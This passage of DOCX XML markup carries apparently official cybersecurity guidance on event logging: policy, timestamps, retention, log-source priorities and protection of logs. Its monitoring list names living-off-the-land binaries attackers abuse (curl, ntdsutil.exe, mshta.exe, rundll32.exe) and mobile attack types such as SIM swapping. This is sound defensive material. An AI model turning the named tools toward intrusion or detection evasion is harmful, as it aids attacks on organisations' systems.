          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Network administrators.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Critical infrastructure providers. Best Practices Enterprise-approved Event Logging Policy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Developing and implementing an enterprise approved logging policy improves an organization's chances of detecting malicious behavior on their systems and enforces a consistent method of logging across an organization's environments. The logging policy should take into consideration any shared responsibilities between service providers and the organization. The policy should also include details of the events to be logged, event logging facilities to be used, how event logs will be monitored, event log retention durations, and when to reassess which logs are worthy of collection. Event Log Quality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Organizations are encouraged to implement an event logging policy focused on capturing high-quality cyber security events to aid network defenders in correctly identifying cyber security incidents. In the context of cyber security incident response and threat detection, event log quality refers to the types of events collected rather than how well a log is formatted. Log quality can vary between organizations due to differences in network environments, the reason behind the need to log, differences in critical assets and the organization's risk appetite.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Useful event logs enrich a network defender's ability to assess security events to identify whether they are false positives or true positives. Implementing high-quality logging will aid network defenders in discovering LOTL techniques that are designed to appear benign in nature.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Note: Capturing a large volume of well-formatted logs can be invaluable for incident responders in forensics analysis scenarios. However, organizations are encouraged to properly organize logged data into 'hot' data storage that is readily available and searchable, or 'cold' data storage that has deprioritized availability and is stored through more economical solutions - an important consideration when evaluating an organization's log storage capacity.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more information on how to prioritize collection of high-quality event logs please refer to CISA's Guidance for Implementing M-21-3: Improving the Federal Government's Investigative and Remediation Capabilities.[1]</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To strengthen detection of malicious actors employing LOTL techniques, some relevant considerations for event logging include: On Linux-based systems, logs capturing the use of curl, systemctl, systemd, python and other common LOLBins leveraged by malicious actors.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>On Microsoft Windows-based systems, logs capturing the use of wmic.exe, ntdsutil.exe, Netsh, cmd.exe, PowerShell, mshta.exe, rundll32.exe, resvr32.exe and other common LOLBins leveraged by malicious actors. Ensure that logging captures command execution, script block logging and module logging for PowerShell, and detailed tracking of administrative tasks. For cloud environments, logging all control plane operations, including API calls and end user logins. The control plane logs should be configured to capture read and write activities, administrative changes, and authentication events. Captured Event Log Details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 a part of an organization's event logging policy, captured event logs should contain sufficient detail to aid network defenders and incident responders. If a logging solution fails to capture data relevant to security, its effectiveness as a cyber security incident detection capability is heavily impacted.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Office of Management and Budget's M-21-31[2] outlines a good baseline for what an event log should capture, if applicable: Properly formatted and accurate timestamp (millisecond granularity is ideal).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Event type (status code).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Device identifier (mac address or other unique identifier).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Session/transaction ID.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Autonomous system number.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Source and destination IP (includes both IPv4 and IPv6).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Status code.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Response time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Additional headers (e.g., HTTP headers).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The user ID, where appropriate.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The command executed, where appropriate.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>A unique event identifier to assist with event correlation, where possible.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Note: Where possible, all data should be formatted as 'key-value-pairs' to allow for easier extraction. Operational Technology Considerations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Network administrators and network operators should take into consideration the OT devices within their OT networks. Most OT devices use embedded software that is memory and/or processor constrained. An excessive level of logging could adversely affect the operation of those OT devices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Additionally, such OT devices may not be capable of generating detailed logs, in which case, sensors can be used to supplement logging capabilities. Out-of-band log communications, or generating logs based on error codes and the payloads of existing communications, can account for embedded devices with limited logging capabilities. Additional Resources ASD's ACSC Information Security Manual (ISM) provides event log details to record in the Guidelines for System Monitoring.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CISA's Guidance for Implementing M-21-31: Improving the Federal Government's Investigative and Remediation Capabilities details another approach to prioritizing log collection and is aimed at US federal civilian executive branch organizations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>NIST has outlined OT considerations for event logging in their Guide to Operational Technology (OT) Security.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>For examples of detection uses cases, consider visiting the MITRE ATT&amp;CK(R) list of data sources. Content and Format Consistency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When centralizing event logs, organizations should consider using a structured log format, such as JSON, where each type of log captures and presents content consistently (that is, consistent schema, format, and order). This is particularly important when event logs have been forwarded to a central storage facility as this improves a network defender's ability to search for, filter and correlate event logs. Since logs may vary in structure (or lack thereof), implementing a method of automated log normalization is recommended. This is an important consideration for logs that can change over time or without notice such as software and software- as-a-service (SaaS) logs. Timestamp Consistency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Organizations should consider establishing an accurate and trustworthy time source and use this consistently across all systems to assist network defenders in identifying connections between event logs. This should also include using the same date-time format across all systems. Where possible, organizations should use multiple accurate time sources in case the primary time source becomes degraded or unavailable. Note that, particularly in distributed systems, time zones and distance can influence how timestamps read in relation to each other. Network owners, system owners and cyber security incident responders are encouraged to understand how this could impact their own environments. ASD and co-authors urge organizations to consider implementing the recommendations below to help ensure consistent timestamp collection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Time servers should be synchronized and validated throughout all environments and set to capture significant events, such as device boots and reboots.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Using Coordinated Universal Time (UTC) has the advantage of no time zones as well as no daylight savings, and is the preferred time standard. Implement ISO 8601 formatting, with the year listed first, followed by the month, day, hour, minutes, seconds, and milliseconds (e.g., 2024-07- 25T20:54:59.649Z).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Timesharing should be unidirectional. The OT environment should synchronize time sync with the IT environment </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>and not the other way around.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Data historians may be implemented on some operational assets to record and store time-series data of industrial processes running on the computer system. These can provide an additional source of event log data for OT networks. Additional Resources ASD has released Windows Event Logging and Forwarding guidance that details important event categories and recommendations for configurations, log retention periods and event forwarding.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>For more information about logging, please explore CISA's Logging Made Easy (LME), a no-cost solution providing essential log management for small to medium-sized organizations, on CISA's website or GitHub page.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Joint SIGINT Cyber Unit (JSCU) of the AIVD and MIVD has published a repository on GitHub with a Microsoft Windows event logging and collections baseline focused on finding balance between forensic value and optimizing retention. You can find this repository on the JSCU's GitHub. Event Log Retention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Organizations should ensure they retain logs for long enough to support cyber security incident investigations. Default log retention periods are often insufficient. Log retention periods should be informed by an assessment of the risks to a given system. When assessing the risks to a system, consider that in some cases, it can take up to 18 months to discover a cyber security incident and some malware can dwell on the network from 70 to 200 days before causing overt harm.[3] Log retention periods should also be compliant with any regulatory requirements and cyber security frameworks that may apply in an organization's jurisdiction. Logs that are crucial in confirming an intrusion and its impact should be prioritized for longer retention.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important to review log storage allocations, in parallel with retention periods. Insufficient storage is a common obstacle to log retention. For example, many systems will overwrite old logs when their storage allocation is exhausted. The longer that logs can be kept, the higher the chances are of determining the extent of a cyber security incident, including the potential intrusion vectors that require remediation. For effective security logging practices, organizations should implement data tiering such as hot and cold storage. This ensures that logs can be promptly retrieved to facilitate querying and threat detection. Centralized Log Collection and Correlation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following sections detail prioritized lists of log sources for enterprise networks, OT, cloud computing and enterprise mobility using mobile computing devices. The prioritization takes into consideration the likelihood that the logged asset will be targeted by a malicious actor, as well as the impact if the asset were to be compromised. It also prioritizes log sources that can assist in identifying LOTL techniques. Please note that this is not an exhaustive list of log sources and their threats, and their priority may differ between organizations. Logging Priorities for Enterprise Networks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Enterprise networks face a large variety of cyber threats. These include malware, malicious insiders, and exploitation of unpatched applications and services. In the context of LOTL, enterprise networks provide malicious actors with a wide variety of native tools to exploit.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ASD and co-authors recommend that organizations prioritize the following log sources within their enterprise network: Critical systems and data holdings likely to be targeted.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Internet-facing services, including remote access, network metadata, and their underlying server operating system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Identity and domain management servers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Any other critical servers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Edge devices such as boundary routers and firewalls.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Administrative workstations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Highly privileged systems such as configuration management, performance and availability monitoring (in cases where privileged access is used), Continuous Integration/Continuous Delivery (CI/CD), vulnerability scanning services, secret and privilege management.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Data repositories.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Security-related and critical software.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>User computers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>User application logs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Web proxies used by organizational users and service accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>DNS services used by organizational users.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Email servers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>DHCP servers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Legacy IT assets (that are not previously captured in critical or internet- facing services).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ASD and co-authors recommend organizations monitor lower priority logs as well. These include: Underlying infrastructure, such as hypervisor hosts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>IT devices, such as printers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Network components such as application gateways. Logging Priorities for Operational Technology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Historically, IT and OT have operated separately and have provided distinct functions within organizations. Advancements in technology and digital transformation have led to the growing interconnectedness and convergence of these networks. Organizations are integrating IT and OT networks to enable the seamless flow of data between management systems and industrial operations. Their integration has introduced new cyber threats to OT networks. For example, malicious actors can access OT networks through IT networks by exploiting unpatched vulnerabilities, delivering malware, or conducting denial-of-service campaigns to impact critical services.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ASD and co-authors recommend that organizations prioritize the following log sources in their OT environment: OT devices critical to safety and service delivery, except for air-gapped systems.[4] Internet-facing OT devices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>OT devices accessible via network boundaries.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Note that in cases where OT devices do not support logging, device logs are not available, or are available in a non-standard format, it is good practice to ensure network traffic and communications to and from the OT devices are logged. Logging Priorities for Enterprise Mobility Using Mobile Computing Devices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Enterprise mobility is an important aspect of an organization's security posture. Mobile device management (MDM) solutions allow organizations to manage the security of their enterprise mobility, typically including logging functionality. In the context of enterprise mobility, the aim of effective event logging is to detect compromised accounts or devices; for example, due to phishing or interactions with malicious applications and websites.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ASD and co-authors recommend organizations priorities the following log sources in their enterprise mobility solution: Web proxies used by organizational users.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Organization operated DNS services.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Device security posture of organizationally managed devices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Device behavior of organizationally managed devices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>User account behavior such as sign-ins.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>VPN solutions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>MDM and Mobile Application Management (MAM) events.[5]</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Additional monitoring should be implemented in collaboration with the telecommunications network provider. Such monitoring includes: Signaling exploitation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Binary/invisible SMS.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CLI spoofing.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>SIM/eSIM activities such as SIM swapping.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Null cipher downgrade.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Connection downgrade (false base station).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Network API/query against user.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Roaming traffic protection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Roaming steering.</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Organizations should obtain legal advice about what can be logged from any personally owned mobile devices that are enrolled in an MDM solution. For example, logging GPS location may be subject to restrictions. Logging Priorities for Cloud Computing</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ASD and co-authors recommend organizations adjust event logging practices in accordance with the cloud service that is administered, whether infrastructure-as-a-service (IaaS), platform-as-a-service (PaaS), or SaaS are implemented. For example, IaaS would include a significant amount of logging responsibility on the tenant, whereas SaaS would place a significant amount of the logging responsibility on the provider.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Therefore, organizations should coordinate closely with their cloud service provider to understand the shared-responsibility model in place, as it will influence their logging priorities. Logging priorities will also be influenced by different cloud computing service models and deployment models (that is, public, private, hybrid, community). Where privacy and data sovereignty laws apply, logging priorities may also be influenced by the location of the cloud service provider's infrastructure. See NSA's Manage Cloud Logs for Effective Threat Hunting guidance for additional information.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Organizations should prioritize the following log sources in their use of cloud computing services: Critical systems and data holdings likely to be targeted.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Internet-facing services (including remote access) and, where applicable, their underlying server operating systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use of the tenant's user accounts that access and administer cloud services. Logs for administrative configuration changes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Logs for the creation, deletion and modification of all security principals, including setting and changing permissions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Authentication success and/or failures to third party services (e.g., SAML/OAuth).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Logs generated by the cloud services, including logs for cloud APIs, all network-related events, compliance events and billing events. Secure Storage and Event Log Integrity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ASD and co-authors recommend that organizations implement a centralized event logging facility such as a secured data lake to enable log aggregation and then forward select, processed logs to analytic tools, such as security information and event management (SIEM) solution and extended detection and response (XDR) solutions. Many commercially available network infrastructure devices have limited local storage. Forwarding event logs to a centralized and secure storage capability prevents the loss of logs once the local device's storage is exhausted [CPG 2.U]. This can be further mitigated by ensuring default maximum event log storage sizes are configured appropriately on local devices. In the event of a cyber security incident, an absence of historical event logs will frequently have a negative impact on cyber security incident response activities. Secure Transport and Storage of Event Logs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ASD and co-authors recommend that organizations implement secure mechanisms such as Transport Layer Security (TLS) 1.3 and methods of cryptographic verification to ensure the integrity of event logs in-transit and at rest. Organizations should prioritize securing and restricting access to event logs that have a justified requirement to record sensitive data. Protecting Event Logs from Unauthorized Access, Modification and Deletion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It is important to perform event log aggregation as some malicious actors are known to modify or delete local system event logs to avoid detection and to delay or degrade the efficacy of cyber security incident response. Logs may contain sensitive data that is useful to a malicious actor. As a result, users should only have access to the event logs they need to do their job.</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 event logging facility should enable the protection of logs from unauthorized modification and deletion. Ensure that only personnel with a justified requirement have permission to delete or modify event logs and view the audit logs for access to the centralized logging environment. The storage of logs should be in a separate or segmented network with additional security controls to reduce the risk of logs being tampered with in the event of network or system compromise. Events logs should also be backed up and data redundancy practices should be implemented.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Organizations are encouraged to harden and segment their SIEM solutions from general IT environments. SIEMs are attractive targets for malicious actors because they contain a wealth of information, provide an analysis function, and can be a single point of failure in an organization's detection capability. Organizations should consider filtering event logs before sending them to a SIEM or XDR to ensure it is receiving the most valuable logs to minimize any additional costs or capacity issues.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Centralized Event Logging Enables Threat Detection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aggregation of event logs to a central logging facility that a SIEM can draw from enables the identification of: Deviations from a baseline.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>A baseline should include installed tools and software, user account behavior, network traffic, system intercommunications and other items, as applicable. Particular attention should be paid to privileged user accounts and critical assets such as domain controllers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
